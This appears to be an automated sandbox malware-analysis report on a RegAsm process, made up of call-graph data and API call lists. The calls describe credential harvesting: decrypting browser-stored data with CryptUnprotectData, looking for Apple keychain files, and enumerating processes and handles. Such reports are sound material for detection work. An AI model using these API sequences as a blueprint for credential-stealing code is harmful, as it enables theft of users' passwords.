38611->38612 38620 40be1e 38611->38620 39183 40440c 38612->39183 38613 40be26 wcsncmp 38613->38620 38616 40be7d memset 38617 40bea7 memcpy 38616->38617 38616->38620 38618 40bf11 wcschr 38617->38618 38617->38620 38618->38620 38619 40b2cc 27 API calls 38621 40bef6 _wcsnicmp 38619->38621 38620->38612 38620->38613 38620->38616 38620->38617 38620->38618 38620->38619 38622 40bf43 LocalFree 38620->38622 39186 40bd5d 28 API calls 38620->39186 39187 404423 38620->39187 38621->38618 38621->38620 38622->38620 38623 4135f7 39199 4135e0 38623->39199 38626 40b2cc 27 API calls 38627 41360d 38626->38627 38628 40a804 8 API calls 38627->38628 38629 413613 38628->38629 38630 41363e 38629->38630 38632 40b273 27 API calls 38629->38632 38631 4135e0 FreeLibrary 38630->38631 38633 413643 38631->38633 38634 413625 38632->38634 38633->38392 38634->38630 38635 413648 38634->38635 38636 413658 
38635->38636 38637 4135e0 FreeLibrary 38635->38637 38636->38392 38638 413666 38637->38638 38638->38392 38641 4136e2 38639->38641 38640 413827 38838 41366b FreeLibrary 38640->38838 38641->38640 38642 4137ac CoTaskMemFree 38641->38642 38642->38641 39202 4449b9 38643->39202 38646 444c1f 38646->38378 38647 4449b9 35 API calls 38649 444b4b 38647->38649 38648 444c15 38651 4449b9 35 API calls 38648->38651 38649->38648 39222 444972 GetVersionExW 38649->39222 38651->38646 38652 444b8c 38653 444b99 memcmp 38652->38653 38654 444c0b 38652->38654 39223 444aa5 35 API calls 38652->39223 39224 40a7a0 GetVersionExW 38652->39224 39225 444a85 35 API calls 38652->39225 38653->38652 39226 444a85 35 API calls 38654->39226 38660 40399d 38659->38660 39227 403a16 38660->39227 38662 403a09 39241 40b1ab free free 38662->39241 38664 403a12 wcsrchr 38664->38385 38665 4039a3 38665->38662 38668 4039f4 38665->38668 39238 40a02c CreateFileW 38665->39238 38668->38662 38669 4099c6 2 API calls 38668->38669 38669->38662 38671 414c2e 16 API calls 38670->38671 38672 404048 38671->38672 38673 414c2e 16 API calls 38672->38673 38674 404056 38673->38674 38675 409d1f 6 API calls 38674->38675 38676 404073 38675->38676 38677 409d1f 6 API calls 38676->38677 38678 40408e 38677->38678 38679 409d1f 6 API calls 38678->38679 38680 4040a6 38679->38680 38681 403af5 20 API calls 38680->38681 38682 4040ba 38681->38682 38683 403af5 20 API calls 38682->38683 38684 4040cb 38683->38684 39268 40414f memset 38684->39268 38686 404140 39282 40b1ab free free 38686->39282 38688 4040ec memset 38691 4040e0 38688->38691 38689 404148 38689->38445 38690 4099c6 2 API calls 38690->38691 38691->38686 38691->38688 38691->38690 38692 40a8ab 9 API calls 38691->38692 38692->38691 39295 40a6e6 WideCharToMultiByte 38693->39295 38695 4087ed 39296 4095d9 memset 38695->39296 38698 408809 memset memset memset memset memset 38699 40b2cc 27 API calls 38698->38699 38700 4088a1 38699->38700 38701 409d1f 6 API calls 38700->38701 38702 4088b1 
38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 4088c0 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 4088d0 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 4088df 38707->38708 38709 409d1f 6 API calls 38708->38709 38710 4088ef 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 4088fe 38711->38712 38730 408953 38730->38445 38745 40b633 free 38744->38745 38746 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38745->38746 38747 413f00 Process32NextW 38746->38747 38748 413da5 OpenProcess 38747->38748 38749 413f17 CloseHandle 38747->38749 38750 413df3 memset 38748->38750 38753 413eb0 38748->38753 38749->38488 39345 413f27 38750->39345 38752 413ebf free 38752->38753 38753->38747 38753->38752 38754 4099f4 3 API calls 38753->38754 38754->38753 38755 413e37 GetModuleHandleW 38757 413e46 38755->38757 38759 413e1f 38755->38759 38757->38759 38758 413e6a QueryFullProcessImageNameW 38758->38759 38759->38755 38759->38758 39350 413959 38759->39350 39366 413ca4 38759->39366 38761 413ea2 CloseHandle 38761->38753 38763 414c2e 16 API calls 38762->38763 38764 403eb7 38763->38764 38765 414c2e 16 API calls 38764->38765 38766 403ec5 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403ee2 38767->38768 38769 409d1f 6 API calls 38768->38769 38770 403efd 38769->38770 38771 409d1f 6 API calls 38770->38771 38772 403f15 38771->38772 38773 403af5 20 API calls 38772->38773 38774 403f29 38773->38774 38775 403af5 20 API calls 38774->38775 38776 403f3a 38775->38776 38777 40414f 33 API calls 38776->38777 38783 403f4f 38777->38783 38778 403faf 39379 40b1ab free free 38778->39379 38779 403f5b memset 38779->38783 38781 403fb7 38781->38427 38782 4099c6 2 API calls 38782->38783 38783->38778 38783->38779 38783->38782 38784 40a8ab 9 API calls 38783->38784 38784->38783 38786 414c2e 16 API calls 38785->38786 38787 403d26 38786->38787 38788 414c2e 16 API calls 38787->38788 38789 403d34 38788->38789 38790 409d1f 6 API calls 38789->38790 38791 403d51 
38790->38791 38792 409d1f 6 API calls 38791->38792 38793 403d6c 38792->38793 38794 409d1f 6 API calls 38793->38794 38795 403d84 38794->38795 38796 403af5 20 API calls 38795->38796 38797 403d98 38796->38797 38798 403af5 20 API calls 38797->38798 38799 403da9 38798->38799 38800 40414f 33 API calls 38799->38800 38806 403dbe 38800->38806 38801 403e1e 39380 40b1ab free free 38801->39380 38802 403dca memset 38802->38806 38804 403e26 38804->38443 38805 4099c6 2 API calls 38805->38806 38806->38801 38806->38802 38806->38805 38807 40a8ab 9 API calls 38806->38807 38807->38806 38809 414b81 8 API calls 38808->38809 38810 414c40 38809->38810 38811 414c73 memset 38810->38811 39381 409cea 38810->39381 38813 414c94 38811->38813 39384 414592 RegOpenKeyExW 38813->39384 38815 414c64 SHGetSpecialFolderPathW 38817 414d0b 38815->38817 38817->38447 38818 414cc1 38819 414cf4 wcscpy 38818->38819 39385 414bb0 wcscpy 38818->39385 38819->38817 38821 414cd2 39386 4145ac RegQueryValueExW 38821->39386 38823 414ce9 RegCloseKey 38823->38819 38825 409d62 38824->38825 38826 409d43 wcscpy 38824->38826 38829 445389 38825->38829 38827 409719 2 API calls 38826->38827 38828 409d51 wcscat 38827->38828 38828->38825 38830 40ae18 9 API calls 38829->38830 38835 4453c4 38830->38835 38831 40ae51 9 API calls 38831->38835 38832 4453f3 38834 40aebe FindClose 38832->38834 38833 40add4 2 API calls 38833->38835 38836 4453fe 38834->38836 38835->38831 38835->38832 38835->38833 38837 445403 250 API calls 38835->38837 38836->38495 38837->38835 38838->38399 38839->38491 38840->38475 38841->38475 38842->38505 38844 409c89 38843->38844 38844->38530 38845->38559 38847 413d39 38846->38847 38848 413d2f FreeLibrary 38846->38848 38849 40b633 free 38847->38849 38848->38847 38850 413d42 38849->38850 38851 40b633 free 38850->38851 38852 413d4a 38851->38852 38852->38521 38853->38428 38854->38435 38855->38457 38857 44db70 38856->38857 38858 40b6fc memset 38857->38858 38859 409c70 2 API calls 38858->38859 38860 40b732 wcsrchr 
37792->37734 37794 41fbf8 37793->37794 37797 41fbf1 37793->37797 37807 41ee26 37794->37807 37798 41fc39 37797->37798 37817 4446ce 11 API calls 37797->37817 37798->37762 37803 41fd5e 37798->37803 37800 41ee6b 85 API calls 37799->37800 37801 41fc5d 37800->37801 37801->37767 37802->37763 37806 41fd65 37803->37806 37804 41fdab 37804->37762 37805 41fbdb 85 API calls 37805->37806 37806->37804 37806->37805 37808 41ee41 37807->37808 37809 41ee32 37807->37809 37818 41edad 37808->37818 37821 4446ce 11 API calls 37809->37821 37812 41ee3c 37812->37797 37815 41ee58 37815->37812 37823 41ee6b 37815->37823 37817->37798 37827 41be52 37818->37827 37821->37812 37822 41eb85 11 API calls 37822->37815 37824 41ee70 37823->37824 37825 41ee78 37823->37825 37883 41bf99 85 API calls 37824->37883 37825->37812 37828 41be6f 37827->37828 37829 41be5f 37827->37829 37834 41be8c 37828->37834 37848 418c63 37828->37848 37862 4446ce 11 API calls 37829->37862 37831 41be69 37831->37812 37831->37822 37834->37831 37835 41bf3a 37834->37835 37836 41bed1 37834->37836 37839 41bee7 37834->37839 37865 4446ce 11 API calls 37835->37865 37838 41bef0 37836->37838 37841 41bee2 37836->37841 37838->37839 37840 41bf01 37838->37840 37839->37831 37866 41a453 85 API calls 37839->37866 37842 41bf24 memset 37840->37842 37844 41bf14 37840->37844 37863 418a6d memset memcpy memset 37840->37863 37852 41ac13 37841->37852 37842->37831 37864 41a223 memset memcpy memset 37844->37864 37847 41bf20 37847->37842 37849 418c72 37848->37849 37850 418c94 37849->37850 37851 418d51 memset memset 37849->37851 37850->37834 37851->37850 37853 41ac52 37852->37853 37854 41ac3f memset 37852->37854 37857 41ac6a 37853->37857 37867 41dc14 19 API calls 37853->37867 37855 41acd9 37854->37855 37855->37839 37859 41aca1 37857->37859 37868 41519d 37857->37868 37859->37855 37860 41acc0 memset 37859->37860 37861 41accd memcpy 37859->37861 37860->37855 37861->37855 37862->37831 37863->37844 37864->37847 37865->37839 37867->37857 37871 4175ed 37868->37871 
37879 417570 SetFilePointer 37871->37879 37874 41760a ReadFile 37876 417637 37874->37876 37877 417627 GetLastError 37874->37877 37875 4151b3 37875->37859 37876->37875 37878 41763e memset 37876->37878 37877->37875 37878->37875 37880 4175b2 37879->37880 37881 41759c GetLastError 37879->37881 37880->37874 37880->37875 37881->37880 37882 4175a8 GetLastError 37881->37882 37882->37880 37883->37825 37884 417bc5 37886 417c61 37884->37886 37890 417bda 37884->37890 37885 417bf6 UnmapViewOfFile CloseHandle 37885->37885 37885->37890 37888 417c2c 37888->37890 37896 41851e 18 API calls 37888->37896 37890->37885 37890->37886 37890->37888 37891 4175b7 37890->37891 37892 4175d6 CloseHandle 37891->37892 37893 4175c8 37892->37893 37894 4175df 37892->37894 37893->37894 37895 4175ce Sleep 37893->37895 37894->37890 37895->37892 37896->37888 39907 4147f3 39910 414561 39907->39910 39909 414813 39911 41456d 39910->39911 39912 41457f GetPrivateProfileIntW 39910->39912 39915 4143f1 memset _itow WritePrivateProfileStringW 39911->39915 39912->39909 39914 41457a 39914->39909 39915->39914

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Control-flow graph for the function starting at 0040DD85 (rendered as a graph in the original report; node and edge data omitted)]
                                          APIs
                                          • memset.MSVCRT ref: 0040DDAD
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                          • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                          • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                          • memset.MSVCRT ref: 0040DF5F
                                          • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                          • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                          • API String ID: 2018390131-3398334509
                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                          APIs
                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                          • free.MSVCRT ref: 00418803
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                          • String ID:
                                          • API String ID: 1355100292-0
                                          • Opcode ID: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                          • Opcode Fuzzy Hash: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 1945712969-0
                                          • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                          • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileFind$FirstNext
                                          • String ID:
                                          • API String ID: 1690352074-0
                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                          APIs
                                          • memset.MSVCRT ref: 0041898C
                                          • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: InfoSystemmemset
                                          • String ID:
                                          • API String ID: 3558857096-0
                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Control-flow graph for the function starting at 0044553B (rendered as a graph in the original report; node and edge data omitted)]
                                          APIs
                                          • memset.MSVCRT ref: 004455C2
                                          • wcsrchr.MSVCRT ref: 004455DA
                                          • memset.MSVCRT ref: 0044570D
                                          • memset.MSVCRT ref: 00445725
                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                          • memset.MSVCRT ref: 0044573D
                                          • memset.MSVCRT ref: 00445755
                                          • memset.MSVCRT ref: 004458CB
                                          • memset.MSVCRT ref: 004458E3
                                          • memset.MSVCRT ref: 0044596E
                                          • memset.MSVCRT ref: 00445A10
                                          • memset.MSVCRT ref: 00445A28
                                          • memset.MSVCRT ref: 00445AC6
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                          • memset.MSVCRT ref: 00445B52
                                          • memset.MSVCRT ref: 00445B6A
                                          • memset.MSVCRT ref: 00445C9B
                                          • memset.MSVCRT ref: 00445CB3
                                          • _wcsicmp.MSVCRT ref: 00445D56
                                          • memset.MSVCRT ref: 00445B82
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                          • memset.MSVCRT ref: 00445986
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                          • API String ID: 2334598624-3798722523
                                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                          • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                          • String ID: $/deleteregkey$/savelangfile
                                          • API String ID: 1442760552-28296030
                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                          • wcsrchr.MSVCRT ref: 0040B738
                                          • memset.MSVCRT ref: 0040B756
                                          • memset.MSVCRT ref: 0040B7F5
                                          • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                          • memset.MSVCRT ref: 0040B851
                                          • memset.MSVCRT ref: 0040B8CA
                                          • memcmp.MSVCRT ref: 0040B9BF
                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                          • memset.MSVCRT ref: 0040BB53
                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                          • String ID: chp$v10
                                          • API String ID: 229402216-2783969131
                                          • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                          • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                          Control-flow Graph

                                          control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                          APIs
                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                          • memset.MSVCRT ref: 00413D7F
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                          • memset.MSVCRT ref: 00413E07
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                          • CloseHandle.KERNEL32(?), ref: 00413EA8
                                          • free.MSVCRT ref: 00413EC1
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                          • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                          • API String ID: 3957639419-1740548384
                                          • Opcode ID: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                          • Opcode Fuzzy Hash: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                            • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                            • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
